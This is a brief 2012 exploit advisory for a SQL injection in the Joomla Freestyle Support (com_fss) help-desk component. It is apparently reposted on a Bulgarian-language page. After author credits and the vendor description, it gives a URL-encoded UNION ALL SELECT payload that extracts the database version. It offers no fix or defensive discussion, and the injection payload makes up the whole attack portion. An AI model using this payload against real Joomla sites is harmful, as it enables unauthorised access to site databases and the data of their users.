Exploit Title: Joomla Freestyle Support com_fss sqli Dork: N/A Date: [17-10-2012] Author: Daniel Barragan "D4NB4R" Twitter: @D4NB4R Vendor: http://freestyle-joomla.com Version: Version (last update on Oct 15, 2012) License: Commercial Download: http://freestyle-joomla.com/fssdownloads Tested on: [Linux(bt5)-Windows(7ultimate)] Especial greetz: Pilot, _84kur10_, nav, dedalo, devboot, ksha, shine, p0fk, the_s41nt Descripcion joomla component: Advanced ticketed support/help desk on your website. Includes Knowledge Base, FAQs, Announcements, Glossary, Tickets by Email, Testimonials and many other features. Robust, customizable, professional, affordable and easy to use. Warning: Invalid argument supplied for foreach() in Exploit: SQL : SQL injection'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R _____________________________________________________ Daniel Barragan "D4NB4R" 2012Брой прочитания на тази страница: 1499
Joomla Freestyle Support (com_fss) SQL Injection